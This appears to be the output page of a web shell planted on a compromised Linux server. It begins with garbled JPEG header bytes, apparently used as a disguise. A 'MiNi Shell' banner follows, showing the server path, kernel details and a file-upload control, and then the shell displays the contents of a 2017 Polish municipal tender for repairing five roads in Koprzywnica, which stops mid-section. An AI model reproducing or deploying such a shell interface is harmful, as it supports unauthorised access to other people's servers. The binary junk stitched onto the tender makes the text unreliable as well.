JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170320/46896-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.koprzywnica.bip.gmina.pl/index.php?id=504' target='_blank'>http://www.koprzywnica.bip.gmina.pl/index.php?id=504</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 46896 - 2017
              z dnia 2017-03-20 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Koprzywnica: Przebudowa i remont dróg na terenie Gminy Koprzywnica<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Koprzywnica, krajowy numer identyfikacyjny
              83040995600000, ul.
              ul. 11 Listopada 
              88,
              27660  
              Koprzywnica, woj.
              świętokrzyskie, państwo
              Polska, tel.
              15 847 70 40, e-mail
              umig.koprzywnica@pro.onet.pl, faks
              15 847 70 77.
              <br />
              Adres strony internetowej (URL): www.koprzywnica.bip.gmina.pl <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.koprzywnica.bip.gmina.pl/index.php?id=504</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.koprzywnica.bip.gmina.pl/index.php?id=504</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy składać w formie pisemnej <br />
                Adres:
                <br />Gmina Koprzywnica,  ul. 11-go Listopada 88, 27-660 Koprzywnica</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa i remont dróg na terenie Gminy Koprzywnica<br /><b>Numer referencyjny: </b>UT.271.3.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />5<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie nr 1 -  Przebudowa drogi gminnej nr 334013T Postronna  wieś  od km 0+000 do km 0+515 i od km 0+900 do km 1+100
Roboty związane z przebudową odcinka drogi gminnej Postronna  wieś polegają na wykonaniu: robót pomiarowych i rozbiórkowych, robotach ziemnych mechanicznych (wykopy), wykonaniu dolnej warstwy podbudowy grub. w-wy 20 cm z kruszywa naturalnego i górnej warstwy podbudowy z kruszywa łamanego grub. w-wy 20 cm  (w miejscach poszerzeń), wzmocnienia podłoża warstwą kruszywa łamanego średnia grub. w-wy 12 cm na odcinku od km 0+900 do km 1+100. 
Roboty nawierzchniowe bitumiczne polegają na:
- (odcinek I  od km 0+000 do km 0+515)  wykonaniu wzmocnienia nawierzchni poprzez ułożenie warstwy wyrównawczej z betonu asfaltowego AC11W w ilości średnio 50 kg/m2, geosiatki do zbrojenia nawierzchni, a następnie warstwy wiążącej z betonu asfaltowego AC11W grub. w-wy 4 cm oraz warstwy ścieralnej z betonu asfaltowego AC8S grub. w-wy 3 cm. 
Szerokość jezdni 3,50 m oraz poboczy bitumicznych 2x0,25 m o konstrukcji jak jezdnia.
- (odcinek II  od km 0+900 do km 1+100)  ułożenie warstwy wiążącej z betonu asfaltowego AC11W grub. w-wy 4 cm oraz warstwy ścieralnej z betonu asfaltowego AC8S grub. w-wy 3 cm. 
Roboty wykończeniowe polegają na utwardzeniu warstwą kruszywa łamanego stabilizowanego mechanicznie grub. 12 cm obustronnych poboczy szerokości po 50 cm na odc. 0+000 do 0+515 oraz szerokości po 0,75 cm na odc. od km 0+900 do km 1+100, a następnie utwardzeniu poboczy poprzez podwójne powierzchniowe utrwalenie grysami i emulsją asfaltową.
Bezpieczeństwo ruchu: należy ustawić znaki pionowe (D-6 + T-27) oraz oznakować przejście dla pieszych farbami chlorokauczukowymi przejście dla pieszych. Dodatkowo na odcinku od km 0+000 do km 0+515 należy oddzielić pobocza bitumiczne od poboczny utwardzonych kruszywem linią przerywaną krawędziową znak P-7c.

Zadanie nr 2 -  Remont drogi gminnej dz. nr 3800 obręb Koprzywnica, Koprzywnica (Budka)  Sośniczany od km 0+000 do km 0+950
Przedmiotem zadania jest wykonanie robót budowlanych polegających na remoncie odcinka drogi gminnej Dz. Nr 3800 obręb Koprzywnica, (Koprzywnica (Budka)  Sośniczany od km 0+000 do km 0+950.
Wykonanie robót ziemnych mechanicznych tj. koryta na głębokość średnio 30 cm celem zachowania istniejącej niwelety drogi oraz miejscową korektę nachylenia skarp wąwozu. Następnie przy użyciu równiarki samojezdnej i walca wibracyjnego  wykonać mechaniczne profilowanie i zagęszczenie istniejącego podłoża. Podbudowa pomocnicza (warstwa dolna) z kruszywa naturalnego o grubości 20 cm należy wykonać z rumoszu skalnego lub pospółki. Podbudowa zasadnicza  (warstwa górna) 
z kruszywa łamanego o uziarnieniu 0/63 mm, grub. w-wy 20 cm.
Na całości remontowanego odcinka  zostanie ułożona  warstwa wiążąca z betonu asfaltowego AC11W dla ruchu KR1 grub. warstwy 4 cm (w ilości średnio 100 kg/m2), a następnie warstwa ścieralna 
z betonu asfaltowego AC8S dla ruchu KR1 grubości 3 cm.
Pobocza uzupełnić kruszywem łamanym stabilizowanym mechanicznie warstwą grubości średnio 10 cm, a następnie podwójnie powierzchniowo utrwalić przy użyciu emulsji asfaltowej kationowej 
i grysów kamiennych.

Zadanie nr 3 -  Remont drogi gminnej dz. nr 202/1 obręb Dmosice, Dmosice  droga krajowa nr 9  od km 0+200 do km 1+225
Niniejsze zadanie obejmuje wykonanie remontu drogi na odcinku długości 1025 mb. Na odcinku od km 0+200 do km 1+225 droga o nawierzchni z kruszywa kamiennego, o dużym nachyleniu niwelety co powoduje, że podczas nawalnego deszczu nawierzchnia drogi jest niszczona i rozmywana.
Istniejącą drogę należy na odcinku, będącym przedmiotem niniejszego zamówienia wzmocnić do  wymaganych parametrów technicznych. 
Należy usunąć z powierzchni poboczy istniejącą warstwę humusu przy użyciu koparki podsiębiernej.
Następnie wykonać mechaniczne profilowanie i zagęszczenie istniejącego podłoża przy użyciu równiarki samojezdnej i walca wibracyjnego. Podbudowa zasadnicza z kruszywa łamanego o uziarnieniu 0/63 mm, grub. w-wy 20 cm.
Na całości projektowanego remontowanego odcinka  zostanie ułożona  warstwa wiążąca z betonu asfaltowego AC11W dla ruchu KR1 w ilości średnio 100 kg/m2, a następnie warstwa ścieralna z betonu asfaltowego AC8S dla ruchu KR1 grubości 3 cm.
Pobocza uzupełnić kruszywem łamanym stabilizowanym mechanicznie warstwą grubości średnio 7 cm, a następnie podwójnie powierzchniowo utrwalić przy użyciu emulsji asfaltowej kationowej i grysów kamiennych.
Konstrukcja nawierzchni jezdni :
- 3 cm  warstwa ścieralna z betonu asfaltowego AC8S dla ruchu KR1
- 4 cm (średnio 100 kg/m2)  warstwa wiążąca z betonu asfaltowego AC11W dla  ruchu KR1
- 20 cm   podbudowa zasadnicza z kruszywa łamanego 0/63 mm
Konstrukcja nawierzchni poboczy :
-   podwójne powierzchniowe utrwalenie nawierzchni grysami kamiennymi i emulsją asfaltową 
-   średnio 7 cm  nawierzchnia poboczy z kruszywa łamanego niesortowanego 0/31,5 mm

Zadanie nr 4 - Przebudowa drogi gminnej dz. nr 435 obręb Gnieszowice, Gnieszowice-Koprzywnica od km 0+286 do km 0+750, celem zabezpieczenia dna wąwozu lessowego
Przedmiot niniejszego zadania obejmuje wykonanie przebudowy drogi na odcinku długości 464 mb. Istniejąca droga na odcinku od km 0+000 do km 0+286 posiada nawierzchnię asfaltową, w km 0+286 do km 0+750 przebiega przez wąwóz lessowy.
Istniejącą drogę należy na całym odcinku wzmocnić do wymaganych parametrów technicznych. Dlatego konieczne jest wykonanie mechanicznego poszerzenia wąwozu wraz z plantowaniem skarp.  
Następnie przy użyciu równiarki samojezdnej i walca wibracyjnego  wykonać mechaniczne profilowanie i zagęszczenie istniejącego podłoża. Podbudowa z kruszywa łamanego o uziarnieniu 0/63 mm, grub. w-wy 20 cm.
Na całości przebudowywanego odcinka  zostanie ułożona  warstwa wiążąca z betonu asfaltowego AC11W dla ruchu KR1 w ilości średnio 100 kg/m2, a następnie warstwa ścieralna z betonu asfaltowego AC8S dla ruchu KR1 grubości 3 cm.
Pobocza uzupełnić kruszywem łamanym stabilizowanym mechanicznie warstwą grubości średnio 7 cm, a następnie podwójnie powierzchniowo utrwalić przy użyciu emulsji asfaltowej kationowej i grysów kamiennych.
Skarpy wąwozu należy lokalnie wzmocnić poprzez ułożenie płyt ażurowych betonowych prefabrykowanych typu MEBA o wymiarach 60x40x8 cm, wysokość umocnienia skarp zależy dostosować w zależności od warunków terenowych.

Zadanie nr 5 -  Remont drogi gminnej dz. nr 3808 obręb Koprzywnica, Koprzywnica (wąwóz)  Kolonia Gnieszowice od km 0+000 do km 0+500, celem zabezpieczenia dna wąwozu lessowego
Niniejsze zadanie obejmuje wykonanie remontu drogi na odcinku długości 500 mb. Istniejąca droga na całym odcinku posiada nawierzchnię gruntową nieulepszoną, w km 0+017 do km 0+267 przebiega przez wąwóz lessowy.
Istniejącą drogę należy na całym odcinku wzmocnić do  wymaganych parametrów technicznych. Dlatego konieczne jest wykonanie mechanicznego poszerzenia wąwozu wraz z plantowaniem skarp.  
Następnie przy użyciu równiarki samojezdnej i walca wibracyjnego  wykonać mechaniczne profilowanie i zagęszczenie istniejącego podłoża. 
Dolna warstwa podbudowy z kruszywa naturalnego np. rumoszu skalnego lub pospółki o grub. w-wy 20 cm. Podbudowa zasadnicza z kruszywa łamanego o uziarnieniu 0/63 mm, grub. w-wy 20 cm.
Na całości remontowanego odcinka  zostanie ułożona  warstwa wiążąca z betonu asfaltowego AC11W dla ruchu KR1 w ilości średnio 100 kg/m2, a następnie warstwa ścieralna z betonu asfaltowego AC8S dla ruchu KR1 grubości 3 cm.
Pobocza uzupełnić kruszywem łamanym stabilizowanym mechanicznie warstwą grubości średnio 7 cm, a następnie podwójnie powierzchniowo utrwalić przy użyciu emulsji asfaltowej kationowej i grysów kamiennych.
Skarpy wąwozu należy lokalnie wzmocnić poprzez ułożenie płyt ażurowych betonowych prefabrykowanych typu MEBA o wymiarach 60x40x8 cm, wysokość umocnienia skarp zależy dostosować w zależności od warunków terenowych.
<br /><br /><b>II.5) Główny kod CPV: </b>45233120-6<br /><b> Dodatkowe kody CPV:</b>45113000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt. 6 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, o wartości do 50 % wartości zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu robót budowlanych podobnych do robót stanowiących przedmiot niniejszego zamówienia<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/07/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający w tym zakresie nie stawia żadnych wymagań, wystarczającym jest złożone wraz z ofertą oświadczenie zgodnie z założeniami w pkt. 9.3<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć:

a)	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej
wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, 
w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert 
Wykonawca potwierdzi spełnienie warunku jeżeli wykaże że posiada nie mniej niż  Zadanie nr 1  100 000,00 PLN, Zadanie nr 2  100 000,00 PLN, Zadanie nr 3  100 000,00 PLN, Zadanie nr 4  100 000,00 PLN, Zadanie nr 5  100 000,00 PLN środków lub zdolność kredytową w tej samej wysokości.
W przypadku składania oferty na kilka zadań wartości te podlegają sumowaniu. 

b)	Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego - to jest wykonywaniem robót budowlanych na kwotę nie mniejszą niż Zadanie nr 1  200 000,00 PLN, Zadanie nr 2  300 000,00 PLN, Zadanie nr 3  300 000,00 PLN, Zadanie nr 4  250 000,00 PLN, Zadanie nr 5  150 000,00 PLN.
W przypadku składania oferty na kilka zadań wartości te podlegają sumowaniu
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a) wykonanych robót
Na potwierdzenie niniejszego warunku należy złożyć wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz 
z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli 
z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty; 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w tym okresie wykonał:
Zadanie nr 1 
dwie roboty budowlane związane z budową lub przebudową lub rozbudową lub remontem drogi. Wymagana wartość wykonanych robót budowlanych wynosiła minimum 200 000,00 zł brutto każda.

Zadanie nr 2
dwie roboty budowlane związane z budową lub przebudową lub rozbudową lub remontem drogi. Wymagana wartość wykonanych robót budowlanych wynosiła minimum 250 000,00 zł brutto każda.

Zadanie nr 3 
dwie roboty budowlane związane z budową lub przebudową lub rozbudową lub remontem drogi. Wymagana wartość wykonanych robót budowlanych wynosiła minimum 250 000,00 zł brutto każda.

Zadanie nr 4
dwie roboty budowlane związane z budową lub przebudową lub rozbudową lub remontem drogi. Wymagana wartość wykonanych robót budowlanych wynosiła minimum 200 000,00 zł brutto każda.

Zadanie nr 5
dwie roboty budowlane związane z budową lub przebudową lub rozbudową lub remontem drogi. Wymagana wartość wykonanych robót budowlanych wynosiła minimum 150 000,00 zł brutto każda.

UWAGA!
W przypadku składania oferty na więcej niż jedno zadanie Wykonawca może wykazać się jedną robotą na zadania, na które składa ofertę, jeżeli sumaryczna wartość tej roboty odpowiada sumarycznej wartości opisanego warunku, np. dla zadania 1 i 2 sumaryczna wartość wykonanej usługi to minimum 450 000,00 zł.

Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.

b)    wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego.
Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz 
z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje n/w osobami:

Zadanie nr 1 
	       Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej,

Zadanie nr 2 
	       Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej,

Zadanie nr 3 
	       Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej,

Zadanie nr 4 
	       Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej,

Zadanie nr 5 
	       Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej,

W przypadku składania oferty na więcej niż jedno zadanie Wykonawca może wykazać się tym samym kierownikiem budowy do wszystkich zadań. 

Do wykazu osób w stosunku do kierownika budowy należy dołączyć oświadczenie Wykonawcy, że zaproponowana osoba posiada wymagane uprawnienia i przynależy do właściwej izby samorządu zawodowego, jeżeli taki wymóg na te osoby nakłada Prawo budowlane.

Zgodnie z art. 12a Prawa budowlanego który to odsyła do ustawy z dnia 18 marca 2008 r.  o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z dnia 17 kwietnia 2008 r. ze zm.) przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależność do izby samorządu zawodowego.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
